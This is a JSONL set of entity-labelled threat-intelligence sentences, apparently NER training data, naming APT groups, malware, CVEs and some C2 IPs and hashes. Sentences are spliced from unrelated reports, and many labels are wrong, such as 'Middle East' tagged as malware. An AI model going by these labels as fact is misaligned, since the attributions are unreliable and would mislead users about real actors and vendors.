{"text": "Of the various binaries downloaded , the most interesting are null , which serves as a local and reverse shell , and rootdaemon , which takes care of privilege escalation and data acquisition . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims . JhoneRAT : 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69 . Antivirus software identifies threats by matching a particular piece of softwares code to programs it has identified as malicious in its database .", "spans": {"MALWARE: JhoneRAT": [[403, 411]], "FILEPATH: 7e1121fca3ac7c2a447b61cda997f3a8202a36bf9bb08cca3402df95debafa69": [[414, 478]], "ORGANIZATION: Antivirus software": [[481, 499]]}, "info": {"id": "cyberner_stix_train_007707", "source": "cyberner_stix_train"}}
{"text": "Cybereason estimates that the files are specifically meant to lure and appeal to victims from the Middle East , especially towards individuals and entities in the Palestinian territories likely related to the Palestinian government or the Fatah movement .", "spans": {"ORGANIZATION: Cybereason": [[0, 10]], "MALWARE: Middle East": [[98, 109]]}, "info": {"id": "cyberner_stix_train_007708", "source": "cyberner_stix_train"}}
{"text": "However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , Barium , Wicked Panda , and GREF .", "spans": {"THREAT_ACTOR: APT20": [[36, 41]], "VULNERABILITY: zero-day exploits": [[50, 67]], "MALWARE: Winnti": [[212, 218]], "THREAT_ACTOR: Barium": [[253, 259]]}, "info": {"id": "cyberner_stix_train_007709", "source": "cyberner_stix_train"}}
{"text": "Some variants have gone so far as to use a different key for the strings of each class . APT5 targeted the network of an electronics firm that sells products for both industrial and military applications . TermSvc Terminal service configuration ( working on Win Xp/2003 ) . None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": {"THREAT_ACTOR: APT5": [[89, 93]], "ORGANIZATION: electronics firm": [[121, 137]], "ORGANIZATION: industrial": [[167, 177]], "ORGANIZATION: military": [[182, 190]], "SYSTEM: Win Xp/2003": [[258, 269]]}, "info": {"id": "cyberner_stix_train_007710", "source": "cyberner_stix_train"}}
{"text": "SMS messages . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks .", "spans": {"TOOL: POWRUNER": [[15, 23]], "TOOL: malicious RTF": [[46, 59]], "VULNERABILITY: CVE-2017-0199": [[80, 93]]}, "info": {"id": "cyberner_stix_train_007711", "source": "cyberner_stix_train"}}
{"text": "SNAKEMACKEREL operations continue to be some of the most far-reaching and sophisticated cyber espionage and intelligence campaigns to date .", "spans": {"THREAT_ACTOR: SNAKEMACKEREL": [[0, 13]]}, "info": {"id": "cyberner_stix_train_007712", "source": "cyberner_stix_train"}}
{"text": "These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks .", "spans": {"ORGANIZATION: private industry": [[38, 54]], "ORGANIZATION: military institutions": [[122, 143]], "ORGANIZATION: governmental organizations": [[150, 176]], "ORGANIZATION: political": [[225, 234], [390, 399]], "ORGANIZATION: human rights organizations": [[246, 272]], "ORGANIZATION: CTU": [[321, 324]], "ORGANIZATION: defense organization": [[404, 424]]}, "info": {"id": "cyberner_stix_train_007713", "source": "cyberner_stix_train"}}
{"text": "The callee then invokes the getAction method to get the decrypted content . which provides a range of services to UK Government . Looking deeper into the structure of SHIPPING_MX00034900_PL_INV_pdf.zip , the attachment has two . Indicators of attack are not so much a static description of the attacker , but a dynamic profile of how an attacker interacts with your technologies and users .", "spans": {"ORGANIZATION: UK Government": [[114, 127]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[167, 201]]}, "info": {"id": "cyberner_stix_train_007715", "source": "cyberner_stix_train"}}
{"text": "This belief is based on the observation that in all of the other PinchDuke samples we have analyzed , the date of the campaign identifier has been within a day of the compilation date .", "spans": {"MALWARE: PinchDuke": [[65, 74]]}, "info": {"id": "cyberner_stix_train_007716", "source": "cyberner_stix_train"}}
{"text": "Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research . Kaspersky Lab documented this behavior in 2014 .", "spans": {"VULNERABILITY: Carbanak": [[28, 36]], "ORGANIZATION: banks": [[70, 75]], "ORGANIZATION: Kaspersky Lab": [[193, 206]]}, "info": {"id": "cyberner_stix_train_007717", "source": "cyberner_stix_train"}}
{"text": "The blog post said HummingBad \" uses a completely different infrastructure with little in common '' with Shedun . simultaneous use of the detected Win32/KillDisk.NBO variants . APT33 : 5.187.21.71 backupnet.ddns.net . In some instances , two randomly generated bytes are added to the end of the file , which invalidates the detection of the dropped files using simple checksum - based techniques .", "spans": {"MALWARE: HummingBad": [[19, 29]], "TOOL: Win32/KillDisk.NBO": [[147, 165]], "THREAT_ACTOR: APT33": [[177, 182]], "IP_ADDRESS: 5.187.21.71": [[185, 196]], "DOMAIN: backupnet.ddns.net": [[197, 215]], "TOOL: checksum - based techniques": [[368, 395]]}, "info": {"id": "cyberner_stix_train_007719", "source": "cyberner_stix_train"}}
{"text": "Given the many artifacts we discovered in the malware code , as well as infrastructure analysis , we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions , just like HackingTeam . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"MALWARE: Skygofree": [[148, 157]], "ORGANIZATION: HackingTeam": [[241, 252]], "THREAT_ACTOR: actors": [[374, 380]], "THREAT_ACTOR: admin@338": [[405, 414]], "ORGANIZATION: governments": [[498, 509]]}, "info": {"id": "cyberner_stix_train_007720", "source": "cyberner_stix_train"}}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "FILEPATH: decoy documents": [[152, 167]], "ORGANIZATION: politically": [[218, 229]], "ORGANIZATION: militarily": [[233, 243]], "ORGANIZATION: political": [[303, 312]]}, "info": {"id": "cyberner_stix_train_007721", "source": "cyberner_stix_train"}}
{"text": "In other words , it goes through every object on the screen and saves its text data . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 .", "spans": {"THREAT_ACTOR: APT28": [[90, 95]], "ORGANIZATION: military": [[245, 253]], "ORGANIZATION: government": [[258, 268]]}, "info": {"id": "cyberner_stix_train_007722", "source": "cyberner_stix_train"}}
{"text": "In addition to the US government , they have targeted organizations across the Defense , Energy , Extractive , Financial , Insurance , Legal , Manufacturing Media , Think Tanks , Pharmaceutical , Research and Technology industries , along with Universities .", "spans": {}, "info": {"id": "cyberner_stix_train_007723", "source": "cyberner_stix_train"}}
{"text": "Based on these , we assess with high confidence that the actor delivered the manipulated installer using the Telegram messenger .", "spans": {"TOOL: Telegram": [[109, 117]]}, "info": {"id": "cyberner_stix_train_007724", "source": "cyberner_stix_train"}}
{"text": "Enlarge / Top 20 countries targeted by Hummingbad/Shedun . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus . APT33 : 8.26.21.223 [REDACTED].ddns.net . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": {"MALWARE: Hummingbad/Shedun": [[39, 56]], "ORGANIZATION: governments": [[71, 82]], "THREAT_ACTOR: ZINC/Lazarus": [[257, 269]], "THREAT_ACTOR: APT33": [[272, 277]], "IP_ADDRESS: 8.26.21.223": [[280, 291]], "DOMAIN: [REDACTED].ddns.net": [[292, 311]], "ORGANIZATION: Harrison": [[337, 345]]}, "info": {"id": "cyberner_stix_train_007725", "source": "cyberner_stix_train"}}
{"text": "The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": {"THREAT_ACTOR: APT41": [[34, 39]], "VULNERABILITY: Nitris Exploit Kit": [[156, 174]], "VULNERABILITY: CottonCastle": [[196, 208]]}, "info": {"id": "cyberner_stix_train_007726", "source": "cyberner_stix_train"}}
{"text": "The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA .", "spans": {"ORGANIZATION: Government": [[9, 19]], "ORGANIZATION: government": [[79, 89]], "THREAT_ACTOR: HIDDEN COBRA": [[93, 105]]}, "info": {"id": "cyberner_stix_train_007727", "source": "cyberner_stix_train"}}
{"text": "Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . At the moment , the group is known to target Russian and Ukrainian banks .", "spans": {"TOOL: Taidoor malware": [[41, 56]], "ORGANIZATION: banks": [[204, 209]]}, "info": {"id": "cyberner_stix_train_007728", "source": "cyberner_stix_train"}}
{"text": "The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "THREAT_ACTOR: attackers": [[136, 145]], "TOOL: emails": [[160, 166]], "FILEPATH: XLS files": [[192, 201]], "ORGANIZATION: employees working in the banking sector": [[205, 244]]}, "info": {"id": "cyberner_stix_train_007729", "source": "cyberner_stix_train"}}
{"text": "The first is a set of campaigns from the 16th and 17th of April , 2009 , that targeted a US based foreign policy think tank , as well as government institutions in Poland and the Czech Republic .", "spans": {}, "info": {"id": "cyberner_stix_train_007730", "source": "cyberner_stix_train"}}
{"text": "] commydriveweb [ . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted . For example , the following command , which was issued by an APT1 actor , will listen for incoming connections on port 443 on the hop and automatically proxy them to the Shanghai IP address 58.247.242.254 on port 443 . Any Greatness affiliates do n’t need a specific set of skills .", "spans": {"THREAT_ACTOR: APT1": [[189, 193]], "IP_ADDRESS: 58.247.242.254": [[318, 332]]}, "info": {"id": "cyberner_stix_train_007731", "source": "cyberner_stix_train"}}
{"text": "The ShadowBrokers is a group of hackers known for leaking exclusive information about the National Security Agency – NSA 's hacking tools and tactics . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": {"THREAT_ACTOR: ShadowBrokers": [[4, 17]], "ORGANIZATION: NSA": [[117, 120]], "ORGANIZATION: Iranians": [[219, 227]]}, "info": {"id": "cyberner_stix_train_007732", "source": "cyberner_stix_train"}}
{"text": "Dropper variants are usually barely functioning photo utility , games , or sex related apps . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting . We observed as the new threat attempted to deploy files that changed every 20-30 minutes on thousands of devices . During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": {"THREAT_ACTOR: SolarWinds Compromise": [[394, 415]], "THREAT_ACTOR: APT29": [[418, 423]]}, "info": {"id": "cyberner_stix_train_007733", "source": "cyberner_stix_train"}}
{"text": "Using Reflection , the server can load the assembly of the client to find the relevant functions and passwords .", "spans": {"TOOL: server": [[23, 29]]}, "info": {"id": "cyberner_stix_train_007734", "source": "cyberner_stix_train"}}
{"text": "The two executables related to Hermes are bitsran.exe and RSW7B37.tmp . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": {"TOOL: Hermes": [[31, 37]], "MALWARE: bitsran.exe": [[42, 53]], "MALWARE: RSW7B37.tmp": [[58, 69]], "VULNERABILITY: 0-day": [[183, 188]], "TOOL: Adobe Flash Player": [[191, 209]], "VULNERABILITY: exploit": [[210, 217]]}, "info": {"id": "cyberner_stix_train_007735", "source": "cyberner_stix_train"}}
{"text": "Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . The POST message is sent to the same site as the fake login page—which an attacker can control inside the Tor network .", "spans": {"THREAT_ACTOR: Leviathan": [[29, 38]], "ORGANIZATION: defense contractors": [[133, 152]]}, "info": {"id": "cyberner_stix_train_007736", "source": "cyberner_stix_train"}}
{"text": "Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "THREAT_ACTOR: Neodymium": [[44, 53]], "THREAT_ACTOR: activity groups": [[93, 108]], "ORGANIZATION: economic": [[167, 175]], "THREAT_ACTOR: PROMETHIUM": [[188, 198]], "THREAT_ACTOR: NEODYMIUM": [[203, 212]], "MALWARE: CRASHOVERRIDE": [[506, 519]], "MALWARE: malware": [[520, 527]]}, "info": {"id": "cyberner_stix_train_007737", "source": "cyberner_stix_train"}}
{"text": "Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits – 4 digits) and the number of cycles (billCount – 2 digits) to repeat the dispensing operation (see Figure 10) . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"MALWARE: Ploutus-D": [[0, 9]], "THREAT_ACTOR: attackers": [[26, 35]], "ORGANIZATION: users": [[246, 251]]}, "info": {"id": "cyberner_stix_train_007738", "source": "cyberner_stix_train"}}
{"text": "Initial request by EventBot Initial request by EventBot to run as a service . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . Regardless of causation , the rapid development of new versions of Emissary suggests that the malware authors are making frequent modifications to evade detection , which as a corollary suggests the Lotus Blossom are actively using the Emissary Trojan as a payload in attacks .", "spans": {"MALWARE: EventBot": [[19, 27], [47, 55]], "MALWARE: Gh0st RAT": [[119, 128]], "THREAT_ACTOR: Ghost Dragon": [[139, 151]], "MALWARE: Emissary": [[345, 353]], "THREAT_ACTOR: Lotus Blossom": [[477, 490]], "MALWARE: Emissary Trojan": [[514, 529]]}, "info": {"id": "cyberner_stix_train_007739", "source": "cyberner_stix_train"}}
{"text": "Adversaries also changed some constants , such as the XOR key used in the previous version .", "spans": {}, "info": {"id": "cyberner_stix_train_007740", "source": "cyberner_stix_train"}}
{"text": "In this blog , we also document other 2017 activity so far by this attack group , including their distribution of ZeroT malware and secondary payloads PCrat S-VULNAME/Gh0st .", "spans": {"MALWARE: ZeroT": [[114, 119]], "VULNERABILITY: PCrat S-VULNAME/Gh0st": [[151, 172]]}, "info": {"id": "cyberner_stix_train_007741", "source": "cyberner_stix_train"}}
{"text": "On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": {"MALWARE: ServHelper": [[66, 76]], "TOOL: emails": [[138, 144]], "MALWARE: RTLO technique": [[194, 208]], "FILEPATH: decoy documents": [[228, 243]]}, "info": {"id": "cyberner_stix_train_007742", "source": "cyberner_stix_train"}}
{"text": "FakeSpy Chunghwa Post version installation process and application UI . Bitdefender’s investigation shows the attackers’ main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee’s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "ORGANIZATION: Chunghwa Post": [[8, 21]], "THREAT_ACTOR: Bitdefender’s": [[72, 85]], "ORGANIZATION: financial transactions": [[340, 362]], "ORGANIZATION: ATM networks": [[366, 378]], "THREAT_ACTOR: Gorgon Group": [[441, 453]]}, "info": {"id": "cyberner_stix_train_007743", "source": "cyberner_stix_train"}}
{"text": "The provided information is then passed to a CreateProcessAsUserA call and the specified command is executed .", "spans": {}, "info": {"id": "cyberner_stix_train_007744", "source": "cyberner_stix_train"}}
{"text": "BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets .", "spans": {"MALWARE: BalkanRAT": [[0, 9]], "MALWARE: BalkanDoor": [[120, 130]], "ORGANIZATION: Rapid7": [[246, 252]]}, "info": {"id": "cyberner_stix_train_007745", "source": "cyberner_stix_train"}}
{"text": "It is possible that CVE-2017-8759 was being used by additional actors . Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": {"VULNERABILITY: CVE-2017-8759": [[20, 33]], "THREAT_ACTOR: actors": [[63, 69]], "MALWARE: GandCrab": [[115, 123]], "ORGANIZATION: customers": [[164, 173]], "ORGANIZATION: IT support firms": [[184, 200]]}, "info": {"id": "cyberner_stix_train_007746", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors have used Java exploits in their SWCs .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: Java": [[25, 29]], "TOOL: exploits": [[30, 38]], "SYSTEM: SWCs": [[48, 52]]}, "info": {"id": "cyberner_stix_train_007747", "source": "cyberner_stix_train"}}
{"text": "Extract data from WeChat app . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable . In most cases , the downloaded file is either an executable that masquerades as a Microsoft Word document or a weaponized Microsoft Word document . According to a recent study by Trellix and the Center for Strategic and International Studies CSIS , 86 of organizations believe they have been targeted by a nationstate threat actor .", "spans": {"SYSTEM: WeChat": [[18, 24]], "TOOL: ProjectSauron": [[70, 83]], "TOOL: malicious modules": [[93, 110]], "TOOL: Microsoft Word document": [[346, 369]], "TOOL: weaponized Microsoft Word": [[375, 400]], "ORGANIZATION: Trellix": [[443, 450]], "ORGANIZATION: Center for Strategic and International Studies CSIS": [[459, 510]], "ORGANIZATION: organizations": [[519, 532]], "THREAT_ACTOR: nationstate threat actor": [[570, 594]]}, "info": {"id": "cyberner_stix_train_007748", "source": "cyberner_stix_train"}}
{"text": "Version 0.3.0.1 includes Italian and Spanish language compatibility within the resources section . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East .", "spans": {"MALWARE: backdoor": [[140, 148]]}, "info": {"id": "cyberner_stix_train_007749", "source": "cyberner_stix_train"}}
{"text": "The process starts when an SMS phishing message arrives at a user ’ s phone . We have identified the tools , techniques , and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China . At this point , the batch script renames the “ 28847 ” file in “ 28847.exe ” , opens it using “ pfljk ,fkbcerbgblfhs ” as password and the file contained inside the “ 28847.exe ” file will be renamed in “ WuaucltIC.exe ” . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"THREAT_ACTOR: Night Dragon—as": [[199, 214]], "FILEPATH: 28847": [[295, 300]], "FILEPATH: 28847.exe": [[312, 321], [412, 421]], "FILEPATH: WuaucltIC.exe": [[449, 462]]}, "info": {"id": "cyberner_stix_train_007750", "source": "cyberner_stix_train"}}
{"text": "“ Agent Smith ” repacks its prey apps at smali/baksmali code level . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand . If not stopped , Dexphot ultimately ran a cryptocurrency miner on the device , with monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware . Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "TOOL: decoy": [[95, 100]], "TOOL: Chitpas Tant Kridakon": [[120, 141]], "MALWARE: Dexphot": [[235, 242]], "THREAT_ACTOR: Cloud API APT29": [[413, 428]], "SYSTEM: Microsoft Graph API": [[447, 466]], "SYSTEM: Azure and M365 environments": [[501, 528]]}, "info": {"id": "cyberner_stix_train_007751", "source": "cyberner_stix_train"}}
{"text": "While the “ core ” module resides inside the APK file , it is encrypted and disguised as a JPG file – the first two bytes are actually the magic header of JPG files , while the rest of the data is encoded with an XOR cipher . At the moment , the group is known to target Russian and Ukrainian banks . 5 、An encrypted data file that holds three additional executables that are loaded into system processes via process hollowing . Enterprise T1649 Steal or Forge Authentication Certificates APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates .", "spans": {"ORGANIZATION: banks": [[293, 298]], "THREAT_ACTOR: Steal or Forge Authentication Certificates APT29": [[446, 494]]}, "info": {"id": "cyberner_stix_train_007752", "source": "cyberner_stix_train"}}
{"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here .", "spans": {"THREAT_ACTOR: Whitefly": [[10, 18]], "ORGANIZATION: healthcare": [[53, 63]], "ORGANIZATION: media": [[66, 71]], "ORGANIZATION: telecommunications": [[74, 92]], "ORGANIZATION: engineering sectors": [[99, 118]], "ORGANIZATION: Kaspersky": [[203, 212]]}, "info": {"id": "cyberner_stix_train_007753", "source": "cyberner_stix_train"}}
{"text": "The Right App at the Right Time The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims . The hackers behind Winnti have also set their sights on Japan’s biggest chemical company , Shin-Etsu Chemical . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website .", "spans": {"MALWARE: HenBox": [[46, 52]], "THREAT_ACTOR: hackers": [[202, 209]], "ORGANIZATION: chemical company": [[270, 286]], "ORGANIZATION: Shin-Etsu Chemical": [[289, 307]], "THREAT_ACTOR: APT16": [[332, 337]], "ORGANIZATION: media": [[357, 362]], "THREAT_ACTOR: APT actors": [[383, 393]], "ORGANIZATION: government agency": [[420, 437]]}, "info": {"id": "cyberner_stix_train_007754", "source": "cyberner_stix_train"}}
{"text": "Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes .", "spans": {"TOOL: Powershell": [[0, 10]], "MALWARE: MimiKatz": [[44, 52]]}, "info": {"id": "cyberner_stix_train_007755", "source": "cyberner_stix_train"}}
{"text": "The complexity and continual development of these tools indicates a mature development process .", "spans": {}, "info": {"id": "cyberner_stix_train_007756", "source": "cyberner_stix_train"}}
{"text": "We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload .", "spans": {"TOOL: Luckystrike": [[128, 139]]}, "info": {"id": "cyberner_stix_train_007757", "source": "cyberner_stix_train"}}
{"text": "remit , SVR , the primary foreign intelligence agency , and the aforementioned GRU .", "spans": {"ORGANIZATION: GRU": [[79, 82]]}, "info": {"id": "cyberner_stix_train_007758", "source": "cyberner_stix_train"}}
{"text": "This happens because the IDE executes the code from the Android debug bridge ( ADB ) by calling the activity declared in the manifest by name . DragonOK appears to operate out of China 's Jiangsu Province . To check this , it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": {"SYSTEM: Android debug bridge": [[56, 76]], "THREAT_ACTOR: DragonOK": [[144, 152]], "MALWARE: COSMICENERGY": [[355, 367]], "MALWARE: specialized OT malware": [[393, 415]]}, "info": {"id": "cyberner_stix_train_007759", "source": "cyberner_stix_train"}}
{"text": "In 2018 , Kaspersky published a report on one of their campaigns , named Operation AppleJeus .", "spans": {}, "info": {"id": "cyberner_stix_train_007760", "source": "cyberner_stix_train"}}
{"text": "Newer HttpBrowser versions use SSL with self-signed certificates to encrypt network communications .", "spans": {"MALWARE: HttpBrowser": [[6, 17]]}, "info": {"id": "cyberner_stix_train_007761", "source": "cyberner_stix_train"}}
{"text": "The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan . PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts .", "spans": {"ORGANIZATION: Proofpoint": [[70, 80]], "ORGANIZATION: embassies": [[199, 208]], "THREAT_ACTOR: PLATINUM": [[242, 250]], "VULNERABILITY: zero-day": [[285, 293]]}, "info": {"id": "cyberner_stix_train_007762", "source": "cyberner_stix_train"}}
{"text": "In this case , the threat actors used compromised credentials to log into an Internet-facing Citrix server to gain access to the network .", "spans": {"TOOL: Internet-facing": [[77, 92]], "TOOL: Citrix": [[93, 99]]}, "info": {"id": "cyberner_stix_train_007763", "source": "cyberner_stix_train"}}
{"text": "One is an open source utility used to remotely issue commands on a Windows host from a Linux host .", "spans": {"SYSTEM: Windows": [[67, 74]], "SYSTEM: Linux": [[87, 92]]}, "info": {"id": "cyberner_stix_train_007764", "source": "cyberner_stix_train"}}
{"text": "What we do know is that several of the malicious files were submitted to a public malware analysis site from the Palestinian Territories .", "spans": {}, "info": {"id": "cyberner_stix_train_007765", "source": "cyberner_stix_train"}}
{"text": "For full details , please reference our 2014 report , APT28 : A Window into Russia ’s Cyber Espionage Operations ? APT28 employs a suite of malware with features indicative of the group ’s plans for continued operations , as well as the group ’s access to resources and skilled developers .", "spans": {"THREAT_ACTOR: APT28": [[54, 59], [115, 120]], "SYSTEM: Window": [[64, 70]]}, "info": {"id": "cyberner_stix_train_007766", "source": "cyberner_stix_train"}}
{"text": "Upload data was queued and transmitted via HTTP PUT requests to an endpoint on the C2 . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East .", "spans": {"THREAT_ACTOR: group": [[92, 97]], "VULNERABILITY: PDF exploits": [[129, 141]], "VULNERABILITY: Adobe Flash Player exploits": [[144, 171]], "VULNERABILITY: CVE-2012-0158": [[189, 202]], "VULNERABILITY: Word exploits": [[203, 216]], "TOOL: Tran Duy Linh": [[263, 276]], "THREAT_ACTOR: MuddyWater": [[285, 295]]}, "info": {"id": "cyberner_stix_train_007767", "source": "cyberner_stix_train"}}
{"text": "In addition , OceanLotus is also known to use ‘watering hole attacks’ , which involve the compromise of a website that the victim is likely to visit . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": {"THREAT_ACTOR: OceanLotus": [[14, 24]], "FILEPATH: malicious documents": [[180, 199]], "VULNERABILITY: CVE-2017-0199": [[211, 224]], "MALWARE: LATENTBOT": [[250, 259]], "MALWARE: malware": [[260, 267]]}, "info": {"id": "cyberner_stix_train_007768", "source": "cyberner_stix_train"}}
{"text": "Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": {}, "info": {"id": "cyberner_stix_train_007769", "source": "cyberner_stix_train"}}
{"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples Sometimes , however , certain samples made use of domain names for HTTP communication . Uploads files to the attackers ’ server . cmd /c \" D:\\pack", "spans": {"ORGANIZATION: eSurv": [[28, 33]], "ORGANIZATION: Google": [[44, 50]], "MALWARE: Exodus One": [[88, 98]]}, "info": {"id": "cyberner_stix_train_007770", "source": "cyberner_stix_train"}}
{"text": "In personally responding to several incidents across multiple industry sectors since early 2018 matching TTPs from the TRITON S-MAL/TRISIS event , these items proved consistent and supported the creation of the XENOTIME activity group .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[119, 138]], "THREAT_ACTOR: XENOTIME": [[211, 219]]}, "info": {"id": "cyberner_stix_train_007771", "source": "cyberner_stix_train"}}
{"text": "EventBot is particularly interesting because it is in such early stages . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": {"ORGANIZATION: EventBot": [[0, 8]], "TOOL: Trojan.Naid": [[179, 190]], "MALWARE: Backdoor.Moudoor": [[193, 209]], "TOOL: Backdoor.Hikit": [[216, 230]], "VULNERABILITY: CVE-2012-0158": [[292, 305]]}, "info": {"id": "cyberner_stix_train_007772", "source": "cyberner_stix_train"}}
